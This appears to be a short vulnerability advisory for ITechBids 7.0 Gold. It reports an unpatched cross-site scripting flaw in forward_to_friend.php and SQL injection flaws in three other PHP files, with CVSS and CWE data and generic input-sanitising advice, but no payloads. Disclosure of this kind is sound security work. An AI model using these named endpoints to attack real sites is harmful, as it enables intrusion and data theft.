Vendor: ITechBids
By: Encrypt3d.M!nd
CVSS: 7.5 (HIGH)
Cross-site scripting (XSS) and Remote SQL Injection(s)
CWE: 79 (XSS) and 89 (SQL Injection)
Product Name: ITechBids
Affected Version From: 7
Affected Version To: 7
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
ITechBids 7.0 Gold Multiple Remote Vulnerabilities
A cross-site scripting (XSS) vulnerability exists in the forward_to_friend.php file, which can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site. Remote SQL injection vulnerabilities exist in the sellers_othersitem.php, classifieds.php and shop.php files, which can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Mitigation:
Input validation should be used to prevent cross-site scripting (XSS) and remote SQL injection attacks. Sanitize all user input data and escape special characters.